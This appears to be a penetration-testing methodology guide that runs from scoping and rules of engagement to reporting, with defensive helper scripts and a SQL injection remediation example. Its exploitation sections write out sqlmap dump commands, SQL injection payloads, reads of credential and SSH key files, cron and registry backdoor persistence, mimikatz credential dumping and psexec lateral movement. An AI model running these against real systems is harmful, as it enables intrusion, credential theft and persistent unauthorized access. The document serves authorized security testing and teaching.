Complete Penetration Testing Methodology

Professional penetration testing requires more than technical skills—it demands a structured methodology that ensures comprehensive coverage, consistent results, and maximum value for clients. This comprehensive guide covers the complete penetration testing lifecycle from initial planning through final reporting, incorporating industry-standard frameworks and best practices.

Understanding Penetration Testing Methodology

A penetration testing methodology is a structured approach to security assessment that ensures:

  • Comprehensive coverage: No critical areas are missed
  • Repeatable results: Consistent quality across engagements
  • Efficient execution: Optimal use of time and resources
  • Professional deliverables: Clear, actionable reporting
  • Risk management: Safe testing practices
  • Legal compliance: Adherence to laws and regulations

Industry-Standard Frameworks

Several established frameworks guide professional penetration testing:

  • PTES (Penetration Testing Execution Standard): Comprehensive methodology covering technical and business aspects
  • OWASP Testing Guide: Focused on web application security
  • OSSTMM (Open Source Security Testing Methodology Manual): Scientific approach to security testing
  • NIST SP 800-115: Technical guide to information security testing
  • MITRE ATT&CK: Adversary tactics and techniques knowledge base
  • SANS Pentest Methodology: Practical approach focusing on real-world attacks

Phase 1: Pre-Engagement

The pre-engagement phase establishes the foundation for successful testing.

1.1 Initial Contact and Scoping

Understand client needs and define engagement parameters.

Key Questions to Address:

Business Objectives:
- What are you trying to protect?
- What are your primary security concerns?
- What prompted this assessment?
- What compliance requirements exist?
- What is the business impact of potential breaches?

Technical Scope:
- Which systems, applications, and networks are in scope?
- Are there any systems explicitly out of scope?
- What access level will be provided (black/grey/white box)?
- Are social engineering and physical security in scope?
- What geographic locations are involved?

Timing:
- What is the desired timeline?
- Are there blackout periods to avoid?
- What hours are permitted for testing?
- What is the expected duration?

Constraints:
- Are there bandwidth limitations?
- Are production systems to be tested?
- Are there systems that cannot be tested?
- What level of testing is permitted (non-invasive, invasive)?

1.2 Rules of Engagement (RoE)

Document clear testing boundaries and protocols.

```markdown
## Rules of Engagement Template

### Scope Definition
**In-Scope Assets:**
- 192.168.1.0/24 network range
- example.com and all subdomains
- Mobile applications: iOS and Android
- Physical location: Main office only

**Out-of-Scope:**
- Third-party hosted services
- Partner networks
- Customer data (unless test accounts)

### Testing Windows
- Preferred: Monday-Friday, 9 AM - 5 PM EST
- Blackout: December 20-31 (holiday freeze)
- Extended hours: Require 24-hour notice

### Approved Techniques
✅ Network scanning and enumeration
✅ Vulnerability exploitation (non-DoS)
✅ Web application testing
✅ Wireless assessment (internal only)
✅ Social engineering (email phishing only)

❌ Denial of service attacks
❌ Physical intrusion without escort
❌ Accessing customer data
❌ Testing third-party systems

### Communication Protocol
**Primary Contact:** [email protected]
**Emergency Contact:** +1-555-123-4567 (24/7)
**Status Updates:** Daily summary at 5 PM EST
**Immediate Notification Required For:**
- Critical vulnerabilities discovered
- System instability observed
- Law enforcement contact
- Testing detected and blocked

### Data Handling
- All findings confidential and encrypted
- No data exfiltration beyond PoC screenshots
- Secure deletion after reporting
- NDA in effect for 3 years

### Liability and Insurance
- $2M professional liability coverage
- Client assumes risk for authorized testing
- Tester not liable for system failures during approved testing
```
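The scope and testing-window rules in the template are only useful if every tool invocation is checked against them before it runs. The script below is an added example, not part of the original article: it encodes the template's in-scope network and domain, the blackout period and the weekday 9-5 EST window, and gates a target on all of them. The out-of-scope hostname is a constructed placeholder, and EST is modelled as a fixed UTC-5 offset (no DST handling) to keep the example self-contained.

```python
"""Scope and testing-window guard built from the Rules of Engagement template.

Added example (not from the original article). In-scope network/domain,
blackout dates and hours mirror the RoE template; the excluded hostname is
a constructed placeholder.
"""
from __future__ import annotations

import ipaddress
from datetime import date, datetime, time, timedelta, timezone

# Constructed from the RoE template
IN_SCOPE_NETWORKS = [ipaddress.ip_network("192.168.1.0/24")]
IN_SCOPE_DOMAINS = ["example.com"]                   # "and all subdomains"
OUT_OF_SCOPE_HOSTS = {"partner-gw.example.com"}      # hypothetical partner-hosted name
EST = timezone(timedelta(hours=-5))                  # fixed offset; DST ignored for simplicity
TESTING_HOURS = (time(9, 0), time(17, 0))            # Monday-Friday, 9 AM - 5 PM EST
BLACKOUT = (date(2024, 12, 20), date(2024, 12, 31))  # holiday freeze


def est_time(year: int, month: int, day: int, hour: int, minute: int = 0) -> datetime:
    """Convenience constructor for an EST-stamped datetime."""
    return datetime(year, month, day, hour, minute, tzinfo=EST)


def target_in_scope(target: str) -> bool:
    """An IP must fall inside an in-scope network; a hostname must be an
    in-scope domain or a subdomain of one. Explicit exclusions always win."""
    name = target.strip().lower().rstrip(".")
    if name in OUT_OF_SCOPE_HOSTS:
        return False
    try:
        addr = ipaddress.ip_address(name)
    except ValueError:
        # Not an IP: match on a label boundary so "notexample.com" does not
        # match "example.com".
        return any(name == d or name.endswith("." + d) for d in IN_SCOPE_DOMAINS)
    return any(addr in net for net in IN_SCOPE_NETWORKS)


def in_testing_window(when: datetime) -> bool:
    """Approved window: weekdays 9-5 EST, outside the blackout period."""
    if when.tzinfo is None:
        when = when.replace(tzinfo=EST)
    local = when.astimezone(EST)
    if BLACKOUT[0] <= local.date() <= BLACKOUT[1]:
        return False
    if local.weekday() >= 5:  # Saturday or Sunday
        return False
    return TESTING_HOURS[0] <= local.time() < TESTING_HOURS[1]


def authorize(target: str, when: datetime) -> tuple[bool, str]:
    """Gate a tool run on scope and window; returns (allowed, reason)."""
    if not target_in_scope(target):
        return False, f"{target} is outside the authorized scope"
    if not in_testing_window(when):
        return False, "outside the approved testing window or inside a blackout period"
    return True, "ok"


if __name__ == "__main__":
    now = est_time(2024, 11, 5, 14)  # constructed: a Tuesday afternoon
    for t in ["192.168.1.10", "api.example.com", "partner-gw.example.com", "10.0.0.5"]:
        print(t, authorize(t, now))
```

Wrapping scanners so they call `authorize()` first (and log the refusal) turns the RoE from a document into an enforced control; a mistyped octet or a stale DNS entry then fails closed instead of hitting a partner network.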

1.3 Legal Authorization

Ensure proper legal authorization and protection before any testing begins.

Essential Documents:

1. Master Services Agreement (MSA)
   - General terms and conditions
   - Payment terms
   - Intellectual property rights
   - Liability limitations

2. Statement of Work (SOW)
   - Specific engagement details
   - Deliverables
   - Timeline and milestones
   - Pricing

3. Non-Disclosure Agreement (NDA)
   - Confidentiality obligations
   - Duration of confidentiality
   - Exceptions

4. Authorization Letter
   - Explicit permission to test
   - Signed by authorized representative
   - Includes scope and testing windows
   - Legal protection for tester

5. Get-Out-Of-Jail-Free Letter
   - Emergency contact information
   - Authorization verification
   - Carry during physical assessments

1.4 Team Assembly and Preparation

```bash
# Create project structure
mkdir -p pentest_project/{recon,scanning,exploitation,loot,reports,scripts}

# Initialize documentation
cat > pentest_project/README.md << 'EOF'
## Penetration Test: [Client Name]
Date: [Start Date] - [End Date]
Tester: [Name]

## Scope
- Target: [Systems/Networks]
- Type: [Black/Grey/White Box]
- Duration: [Days]

## Status
- [ ] Pre-engagement complete
- [ ] Information gathering
- [ ] Vulnerability assessment
- [ ] Exploitation
- [ ] Post-exploitation
- [ ] Reporting

## Critical Findings
(Document as discovered)

## Access Credentials
(Secure storage location)
EOF

# Set up note-taking
cherrytree pentest_notes.ctb &

# Configure tools
# Metasploit workspace
msfconsole -q -x "workspace -a client_name; exit"

# Burp Suite project
# Create new project: client_name.burp
```

Phase 2: Information Gathering (Reconnaissance)

Collect as much information as possible about the target.

2.1 Passive Information Gathering

```bash
#!/bin/bash
# passive_recon.sh

TARGET="example.com"
OUTPUT_DIR="recon/passive"

mkdir -p "$OUTPUT_DIR"

echo "[+] Starting passive reconnaissance on $TARGET"

# WHOIS information
echo "[+] WHOIS lookup..."
whois "$TARGET" > "$OUTPUT_DIR/whois.txt"

# DNS information (many resolvers refuse ANY; the MX and TXT queries still answer)
echo "[+] DNS enumeration..."
dig "$TARGET" ANY > "$OUTPUT_DIR/dns_any.txt"
dig "$TARGET" MX > "$OUTPUT_DIR/dns_mx.txt"
dig "$TARGET" TXT > "$OUTPUT_DIR/dns_txt.txt"

# Subdomain enumeration
echo "[+] Subdomain discovery..."
theHarvester -d "$TARGET" -b all -f "$OUTPUT_DIR/theharvester"
sublist3r -d "$TARGET" -o "$OUTPUT_DIR/sublist3r.txt"

# Certificate transparency
echo "[+] Certificate transparency logs..."
curl -s "https://crt.sh/?q=%25.$TARGET&output=json" | jq -r '.[].name_value' | sort -u > "$OUTPUT_DIR/crtsh.txt"

# Web archive
echo "[+] Historical data..."
curl -s "http://web.archive.org/cdx/search/cdx?url=*.$TARGET&output=json&fl=original&collapse=urlkey" > "$OUTPUT_DIR/wayback.json"

# Social media
echo "[+] Social media intelligence..."
# Manual: LinkedIn, Twitter, Facebook
# Document employees, technologies, relationships

# Technology fingerprinting
echo "[+] Technology identification..."
whatweb "$TARGET" > "$OUTPUT_DIR/whatweb.txt"

# Email harvesting
echo "[+] Email harvesting..."
theHarvester -d "$TARGET" -b google,bing,linkedin -f "$OUTPUT_DIR/emails"

echo "[+] Passive reconnaissance complete. Results in $OUTPUT_DIR/"
```

2.2 Active Information Gathering

```bash
#!/bin/bash
# active_recon.sh

TARGET="192.168.1.0/24"
DOMAIN="example.com"
OUTPUT_DIR="recon/active"

mkdir -p "$OUTPUT_DIR"

echo "[+] Starting active reconnaissance"

# Host discovery
echo "[+] Host discovery..."
nmap -sn "$TARGET" -oA "$OUTPUT_DIR/host_discovery"

# Port scanning
echo "[+] Port scanning..."
nmap -p- -T4 -sV -sC -oA "$OUTPUT_DIR/full_scan" "$TARGET"

# Service enumeration (quote the script list so the shell does not expand *-enum against local files)
echo "[+] Service enumeration..."
nmap -sV --script="banner,*-enum" -oA "$OUTPUT_DIR/service_enum" "$TARGET"

# Web service discovery: hosts with a common web port open in the greppable output
# (the leading space anchors the port so 4480/open does not match 80/open)
echo "[+] Web service identification..."
grep -E ' (80|443|8080)/open' "$OUTPUT_DIR/full_scan.gnmap" | awk '{print $2}' | sort -u > "$OUTPUT_DIR/web_hosts.txt"

# Screenshot web services
echo "[+] Taking screenshots..."
eyewitness -f "$OUTPUT_DIR/web_hosts.txt" -d "$OUTPUT_DIR/screenshots"

# Directory enumeration (one background job per host; wait for all of them before exiting)
echo "[+] Directory enumeration (background)..."
while read -r host; do
    gobuster dir -u "http://$host" -w /usr/share/wordlists/dirb/common.txt -o "$OUTPUT_DIR/gobuster_$host.txt" &
done < "$OUTPUT_DIR/web_hosts.txt"
wait

echo "[+] Active reconnaissance complete. Check $OUTPUT_DIR/ for results."
```

2.3 Analysis and Attack Surface Mapping

Document all discovered assets and potential attack vectors:

```markdown
## Attack Surface Analysis

## External Assets
- 15 web applications identified
- 8 mail servers discovered
- 3 VPN endpoints found
- 12 subdomains enumerated

## Technologies Detected
- Apache 2.4.41 (potentially outdated)
- PHP 7.2 (end of life)
- WordPress 5.8 (plugins outdated)
- Microsoft Exchange 2016
- Cisco ASA 5505

## Potential Attack Vectors
1. Outdated WordPress plugins → RCE
2. Exposed admin panels → Credential attacks
3. Missing security headers → XSS potential
4. Open SMB shares → Information disclosure
5. Weak SSL/TLS configuration → MITM attacks

## Priority Targets
1. admin.example.com - Admin portal, high value
2. mail.example.com - Exchange server, potential for lateral movement
3. vpn.example.com - Remote access, critical entry point
```
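The attack-surface document above is normally filled in by hand from the scan output. The script below is an added example, not code from the article: it parses the XML that `nmap -oA` writes (`full_scan.xml`), keeps only open ports on hosts that were up, and produces the host count, service mix, web-host list and product/version inventory that the template asks for. The embedded XML is a constructed, trimmed sample in nmap's output shape; no real hosts are involved.

```python
"""Attack-surface inventory from nmap XML output.

Added example (not the article's code). SAMPLE_NMAP_XML is a constructed
sample in the shape of `nmap -oA` output; WEB_PORTS is an assumption.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET
from collections import Counter
from dataclasses import dataclass

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <hostnames><hostname name="admin.example.com" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.4.41"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.1.20" addrtype="ipv4"/>
    <hostnames/>
    <ports>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https" product="nginx" version="1.18.0"/></port>
      <port protocol="tcp" portid="8080"><state state="open"/><service name="http-proxy"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="192.168.1.30" addrtype="ipv4"/></host>
</nmaprun>
"""

WEB_PORTS = {80, 443, 8080, 8443}  # assumption: ports treated as web services


@dataclass(frozen=True)
class OpenService:
    host: str
    hostname: str
    port: int
    service: str
    product: str
    version: str


def parse_nmap_xml(xml_text: str) -> list[OpenService]:
    """One record per open port on each host whose status was 'up'."""
    records: list[OpenService] = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name", "") if hn is not None else ""
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            records.append(OpenService(addr.get("addr", ""), hostname,
                                       int(port.get("portid", "0")),
                                       get("name"), get("product"), get("version")))
    return records


def attack_surface(records: list[OpenService]) -> dict:
    """Counts and lists that feed the Attack Surface Analysis notes."""
    web_hosts = sorted({r.host for r in records
                        if r.port in WEB_PORTS or r.service.startswith("http")})
    technologies = sorted({f"{r.product} {r.version}".strip() for r in records if r.product})
    return {"hosts": len({r.host for r in records}), "open_ports": len(records),
            "services": dict(Counter(r.service for r in records)),
            "web_hosts": web_hosts, "technologies": technologies}


def render_markdown(summary: dict) -> str:
    """Emit the skeleton of the notes template from the summary."""
    lines = ["## Attack Surface Analysis", "", "## External Assets",
             f"- {summary['hosts']} hosts up, {summary['open_ports']} open ports",
             f"- {len(summary['web_hosts'])} web services: {', '.join(summary['web_hosts'])}",
             "", "## Technologies Detected"] + [f"- {t}" for t in summary["technologies"]]
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_markdown(attack_surface(parse_nmap_xml(SAMPLE_NMAP_XML))))
```

Because the records carry product and version strings, the same list can be diffed against the client's asset inventory to find unmanaged hosts, which is often the most valuable output of the reconnaissance phase for the defender.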

Phase 3: Vulnerability Assessment

Identify security weaknesses in discovered assets.

3.1 Automated Vulnerability Scanning

```bash
#!/bin/bash
# vulnerability_scan.sh

TARGET="192.168.1.0/24"
OUTPUT_DIR="scanning/vulnerabilities"
WEB_HOSTS="recon/active/web_hosts.txt"

mkdir -p "$OUTPUT_DIR"

echo "[+] Starting vulnerability assessment"

# Nmap vulnerability scripts
echo "[+] Running Nmap vuln scripts..."
nmap --script vuln -oA "$OUTPUT_DIR/nmap_vulnscan" "$TARGET"

# Nikto web scanning
echo "[+] Scanning web applications..."
while read -r webhost; do
    nikto -h "$webhost" -o "$OUTPUT_DIR/nikto_$webhost.txt"
done < "$WEB_HOSTS"

# Nuclei scanning
echo "[+] Running Nuclei templates..."
nuclei -l "$WEB_HOSTS" -t nuclei-templates/ -o "$OUTPUT_DIR/nuclei_results.txt"

# SSL/TLS testing (sslscan takes a host, not a CIDR range, so test each web host)
echo "[+] SSL/TLS configuration testing..."
while read -r webhost; do
    sslscan --show-certificate "$webhost" > "$OUTPUT_DIR/sslscan_$webhost.txt"
done < "$WEB_HOSTS"

# WordPress scanning (if applicable)
echo "[+] WordPress scanning..."
wpscan --url http://example.com --enumerate vp,vt,u --api-token YOUR_TOKEN -o "$OUTPUT_DIR/wpscan.txt"

echo "[+] Vulnerability assessment complete. Review $OUTPUT_DIR/"
```

3.2 Manual Vulnerability Analysis

```markdown
## Web application manual testing checklist

## Authentication
- [ ] Weak password policy
- [ ] Username enumeration
- [ ] Brute force protection
- [ ] Password reset security
- [ ] Session management
- [ ] Multi-factor authentication bypass

## Authorization
- [ ] Horizontal privilege escalation
- [ ] Vertical privilege escalation
- [ ] Direct object reference
- [ ] Function-level access control

## Input Validation
- [ ] SQL injection (all parameters)
- [ ] Cross-site scripting (reflected, stored, DOM)
- [ ] Command injection
- [ ] Path traversal
- [ ] XML external entities
- [ ] Server-side request forgery
- [ ] Template injection
- [ ] LDAP injection

## Configuration
- [ ] Default credentials
- [ ] Directory listing
- [ ] Verbose error messages
- [ ] Security headers missing
- [ ] Unnecessary services exposed
- [ ] Outdated software versions

## Logic Flaws
- [ ] Business logic bypass
- [ ] Payment manipulation
- [ ] Race conditions
- [ ] Time-of-check-time-of-use
```

3.3 Vulnerability Prioritization

Use CVSS scoring and business impact:

Vulnerability Prioritization Matrix:

Critical (CVSS 9.0-10.0):
- Unauthenticated remote code execution
- SQL injection with admin access
- Exposed administrative interfaces
→ Immediate exploitation attempt

High (CVSS 7.0-8.9):
- Authenticated RCE
- Privilege escalation to admin
- Sensitive data exposure
→ Exploitation after critical items

Medium (CVSS 4.0-6.9):
- Limited data exposure
- DoS vulnerabilities
- Missing security features
→ Document and test if time permits

Low (CVSS 0.1-3.9):
- Information disclosure (non-sensitive)
- Minor configuration issues
→ Document only, no active testing
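The matrix combines two inputs, the CVSS band and the business impact of the affected asset, and the second is what keeps a medium finding on the VPN concentrator from being buried under a high finding on a marketing blog. The script below is an added example, not the article's code: severity bands and per-band actions follow the matrix above, the asset-criticality weights are taken from the priority-target list in 2.3, and the findings themselves are constructed. Severity is the primary sort key and the criticality-weighted score orders findings within a band.

```python
"""CVSS-plus-business-impact prioritization.

Added example (not the article's code). Bands follow the prioritization
matrix; ASSET_CRITICALITY and SAMPLE_FINDINGS are constructed assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass

# (lower bound inclusive, label), highest first, from the matrix above
SEVERITY_BANDS = [(9.0, "Critical"), (7.0, "High"), (4.0, "Medium"), (0.1, "Low")]
ACTIONS = {
    "Critical": "Validate immediately",
    "High": "Validate after critical items",
    "Medium": "Document and test if time permits",
    "Low": "Document only, no active testing",
    "Informational": "Document only",
}
# Assumed weights derived from the priority-target list: 3 = crown jewel, 1 = default
ASSET_CRITICALITY = {"admin.example.com": 3, "vpn.example.com": 3, "mail.example.com": 2}


@dataclass(frozen=True)
class Finding:
    title: str
    asset: str
    cvss: float


def severity(cvss: float) -> str:
    """Map a CVSS base score to the matrix's band; 0.0 is informational."""
    if not 0.0 <= cvss <= 10.0:
        raise ValueError(f"CVSS score out of range: {cvss}")
    for lower, label in SEVERITY_BANDS:
        if cvss >= lower:
            return label
    return "Informational"


def band_rank(cvss: float) -> int:
    """0 for Critical ... 3 for Low, 4 for Informational (lower sorts first)."""
    labels = [label for _, label in SEVERITY_BANDS]
    sev = severity(cvss)
    return labels.index(sev) if sev in labels else len(labels)


def priority_score(f: Finding) -> float:
    """CVSS weighted by asset criticality, so the same weakness on a high-value
    system sorts above the same weakness on a low-value one within a band."""
    return f.cvss * ASSET_CRITICALITY.get(f.asset, 1)


def plan(findings: list[Finding]) -> list[dict]:
    """Ordered test queue: severity band first, weighted score second."""
    ordered = sorted(findings, key=lambda f: (band_rank(f.cvss), -priority_score(f)))
    return [{"title": f.title, "asset": f.asset, "cvss": f.cvss,
             "severity": severity(f.cvss), "action": ACTIONS[severity(f.cvss)],
             "score": priority_score(f)} for f in ordered]


SAMPLE_FINDINGS = [  # constructed
    Finding("Verbose error messages", "blog.example.com", 3.7),
    Finding("Outdated WordPress plugin with public exploit", "blog.example.com", 8.8),
    Finding("Privilege escalation to admin", "admin.example.com", 8.0),
    Finding("SQL injection in user search", "admin.example.com", 9.8),
    Finding("Weak TLS configuration", "vpn.example.com", 5.9),
]

if __name__ == "__main__":
    for row in plan(SAMPLE_FINDINGS):
        print(f"{row['score']:5.1f}  {row['severity']:<8} {row['asset']:<18} "
              f"{row['title']} -> {row['action']}")
```

Note the effect of the weighting on the two High findings: the 8.0 on the admin portal (weighted 24.0) is queued ahead of the 8.8 on the blog (8.8), which is the ordering a client's risk owner would expect even though pure CVSS says otherwise.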

Phase 4: Exploitation

Demonstrate real-world impact of identified vulnerabilities.

4.1 Exploitation Planning

```markdown
## Exploitation Plan

## Target: admin.example.com
**Vulnerability:** SQL Injection in user search
**Severity:** Critical
**CVSS:** 9.8

### Exploitation Steps:
1. Confirm vulnerability with SQLMap
2. Extract database schema
3. Dump admin credentials
4. Crack password hashes
5. Login to admin panel
6. Document access level

### Success Criteria:
- Admin panel access achieved
- Demonstrate data access
- Screenshot proof of concept
- No system damage

### Rollback Plan:
- No data modification
- No account lockouts
- Clean up test accounts
- Remove uploaded files

### Safety Measures:
- Read-only SQL queries only
- Backup before testing
- Test during approved window
- Monitor for system issues
```

4.2 Exploitation Execution

```bash
# SQL Injection exploitation example

# Confirm vulnerability
sqlmap -u "http://admin.example.com/search?user=test" --batch

# Enumerate databases
sqlmap -u "http://admin.example.com/search?user=test" --dbs --batch

# Get tables
sqlmap -u "http://admin.example.com/search?user=test" -D webapp --tables --batch

# Dump credentials
sqlmap -u "http://admin.example.com/search?user=test" -D webapp -T users --dump --batch

# Save results
mv ~/.sqlmap/output/admin.example.com exploitation/sqli_admin_portal/
```

4.3 Post-Exploitation

After gaining access, demonstrate potential impact:

```bash
# Linux post-exploitation

# System information
uname -a
cat /etc/issue
hostname
cat /proc/version

# User information
id
whoami
cat /etc/passwd
cat /etc/group
sudo -l

# Network information
ifconfig
ip addr
netstat -antp
ss -antp

# Interesting files
find / -name "*.conf" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find /home -name "*.txt" 2>/dev/null
cat ~/.bash_history

# Privilege escalation enumeration
./linpeas.sh
./linux-exploit-suggester.sh

# Lateral movement opportunities
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts
cat ~/.ssh/config
```

Phase 5: Post-Exploitation and Lateral Movement

Demonstrate the full extent of potential compromise.

5.1 Maintaining Access

```bash
# Establish persistence (for demonstration)

# Linux SSH backdoor (remove after testing)
mkdir -p ~/.ssh
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

# Cron job (for PoC)
(crontab -l 2>/dev/null; echo "@reboot /tmp/backdoor.sh") | crontab -

# Windows registry run key (for PoC)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

# Document and remove all persistence mechanisms before engagement ends
```

5.2 Lateral Movement

```bash
# Credential harvesting
mimikatz.exe
sekurlsa::logonpasswords
sekurlsa::tickets

# Network scanning from compromised host
nmap -sn 10.10.10.0/24

# Impacket lateral movement
psexec.py domain/user:[email protected]
wmiexec.py domain/user:[email protected]

# SSH key usage
ssh -i stolen_key [email protected]

# Document all lateral movement paths
```

5.3 Data Access Demonstration

```bash
# Demonstrate access to sensitive data (screenshots only)

# Database access
mysql -u admin -ppassword -e "SELECT * FROM customers LIMIT 5;"

# File system access
ls -la /var/www/sensitive_docs/
head -5 /var/www/sensitive_docs/confidential.pdf

# API access
curl -H "Authorization: Bearer $TOKEN" https://api.example.com/v1/users

# Screenshot evidence only - no data exfiltration
screencapture evidence_database_access.png
```

Phase 6: Reporting

Transform technical findings into actionable business intelligence.

6.1 Executive Summary

```markdown
## Executive Summary

## Assessment Overview
From November 1-15, 2024, [Your Company] conducted a comprehensive penetration
test of Example Corp's external-facing applications and network infrastructure.

## Key Findings
- **5 Critical vulnerabilities** requiring immediate attention
- **12 High-risk issues** that could lead to data breaches
- **8 Medium-risk** configuration problems
- **15 Low-risk** informational findings

## Business Impact
The identified vulnerabilities could allow an attacker to:
1. Gain administrative access to customer database (500,000 records)
2. Execute arbitrary code on web servers
3. Access sensitive employee and financial data
4. Pivot into internal network segments
5. Establish persistent backdoor access

**Estimated Business Impact:** $2.5M - $5M based on breach cost calculations

## Risk Rating
**Overall Risk: HIGH**

Without remediation, Example Corp faces:
- Data breach affecting customer PII
- Regulatory compliance violations (GDPR, PCI-DSS)
- Reputational damage
- Financial penalties

## Recommendations
1. **Immediate** (0-7 days): Patch critical RCE vulnerabilities
2. **Short-term** (1-4 weeks): Implement WAF, update frameworks
3. **Medium-term** (1-3 months): Security awareness training, code review
4. **Long-term** (3-12 months): Security architecture review, DevSecOps

## Positive Findings
- Effective network segmentation
- Strong password policy enforced
- Security monitoring in place
- Rapid incident response capabilities
```

6.2 Technical Findings

```markdown
## Finding: SQL Injection in User Search

## Vulnerability Details
**Title:** SQL Injection in User Search Functionality
**Severity:** Critical (CVSS 9.8)
**Affected System:** admin.example.com
**Affected Component:** /api/v1/users/search
**Vulnerability Type:** CWE-89: SQL Injection

## Description
The user search functionality is vulnerable to SQL injection through the
`username` parameter. The application fails to properly sanitize user input,
allowing attackers to inject arbitrary SQL commands.

## Technical Details
**Vulnerable Parameter:** username
**Injection Point:** GET /api/v1/users/search?username=VALUE
**Database Type:** MySQL 5.7.33
**Web Server:** Apache 2.4.41
**Application:** PHP 7.2.34
```

Proof of Concept

```bash
# Test for vulnerability
curl "http://admin.example.com/api/v1/users/search?username=admin' OR '1'='1"

# Extract database version
curl "http://admin.example.com/api/v1/users/search?username=admin' UNION SELECT @@version--"

# Dump user table
sqlmap -u "http://admin.example.com/api/v1/users/search?username=test" --dump -D webapp -T users
```

Impact

An attacker exploiting this vulnerability can:

  • Extract all data from the database (500,000 customer records)
  • Modify or delete database records
  • Bypass authentication mechanisms
  • Execute operating system commands (via INTO OUTFILE)
  • Obtain database administrator credentials
  • Pivot to internal database servers

Data at Risk:

  • Customer PII (names, addresses, SSNs)
  • Payment card information
  • Employee credentials
  • Financial records

Evidence

  • [Screenshot: SQLMap confirming vulnerability]
  • [Screenshot: Database dump showing customer data]
  • [Screenshot: Admin password hash extracted]

Reproduction Steps

  1. Navigate to http://admin.example.com
  2. Enter search term: admin' OR '1'='1--
  3. Observe all users returned
  4. Use SQLMap for automated exploitation
  5. Extract sensitive data

Remediation

Immediate Actions (0-7 days):

  1. Deploy WAF rules to block SQL injection attempts
  2. Disable vulnerable endpoint until code is fixed
  3. Monitor logs for exploitation attempts
  4. Review database logs for unauthorized access

Short-term Fixes (1-2 weeks):

  1. Implement prepared statements:

```php
$stmt = $pdo->prepare('SELECT * FROM users WHERE username = ?');
$stmt->execute([$username]);
```

  2. Input validation (the allowlist regex is the effective control; `FILTER_SANITIZE_STRING` is deprecated as of PHP 8.1 and strips rather than rejects):

```php
$username = filter_var($username, FILTER_SANITIZE_STRING);
if (!preg_match('/^[a-zA-Z0-9_]+$/', $username)) {
    throw new Exception('Invalid username format');
}
```

  3. Least privilege: Database user should not have FILE privileges
  4. Error handling: Don't expose SQL errors to users
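The two short-term fixes are easiest to appreciate side by side with the defect they remove. The script below is an added example, not the article's PHP: it builds a three-row in-memory SQLite table (constructed data), runs the reproduction payload from the finding through a string-built query and through a parameterized one, and layers the allowlist check in front of the safe query. Running it shows the vulnerable version returning every row and the fixed version returning none, which is exactly the evidence a retest should capture.

```python
"""Vulnerable search beside its parameterized fix.

Added example (not the article's PHP). Table contents are constructed; the
payload is the one quoted in the reproduction steps of the finding.
"""
from __future__ import annotations

import re
import sqlite3

USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")  # allowlist, mirrors the PHP regex


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's users table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "user"), ("bob", "user"), ("admin", "admin")])
    return conn


def search_vulnerable(conn: sqlite3.Connection, username: str) -> list[str]:
    """String-built query: the input becomes SQL syntax (CWE-89)."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn: sqlite3.Connection, username: str) -> list[str]:
    """Prepared statement: the driver binds the value, so quotes stay data."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def validate_username(username: str) -> str:
    """Defence in depth: reject input outside the expected character set
    before it reaches the data layer; returns the value unchanged if valid."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("Invalid username format")
    return username


def search_hardened(conn: sqlite3.Connection, username: str) -> list[str]:
    """Allowlist validation in front of the parameterized query."""
    return search_fixed(conn, validate_username(username))


if __name__ == "__main__":
    conn = make_db()
    payload = "admin' OR '1'='1"
    print("vulnerable:", search_vulnerable(conn, payload))  # every row comes back
    print("fixed:     ", search_fixed(conn, payload))       # no row has that literal name
    try:
        search_hardened(conn, payload)
    except ValueError as exc:
        print("hardened:  ", exc)
```

The validation layer matters even with prepared statements because a parameterized query cannot help where the input is later used as an identifier, in an ORDER BY clause, or in a dynamically assembled query somewhere else in the codebase.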

Long-term Solutions:

  1. Security code review of entire application
  2. Implement SAST/DAST in CI/CD pipeline
  3. Security awareness training for developers
  4. Regular penetration testing
  5. Bug bounty program

References

Timeline

  • Discovered: November 5, 2024
  • Validated: November 5, 2024
  • Reported: November 15, 2024
  • Expected Fix: TBD
  • Re-test: TBD

6.3 Remediation Tracking

```markdown
## Remediation Roadmap

## Critical Priority (0-7 days)
- [ ] SQL Injection in admin portal - @security-team
- [ ] RCE via file upload - @dev-team
- [ ] Default admin credentials on server - @ops-team
- [ ] Unauthenticated API access - @api-team
- [ ] Missing authentication on admin panel - @web-team

## High Priority (1-4 weeks)
- [ ] Outdated WordPress plugins - @cms-team
- [ ] XSS in contact form - @dev-team
- [ ] Session fixation vulnerability - @security-team
- [ ] Insecure direct object reference - @api-team
- [ ] Missing rate limiting - @ops-team

## Medium Priority (1-3 months)
- [ ] Missing security headers - @ops-team
- [ ] Weak SSL/TLS configuration - @network-team
- [ ] Information disclosure in errors - @dev-team
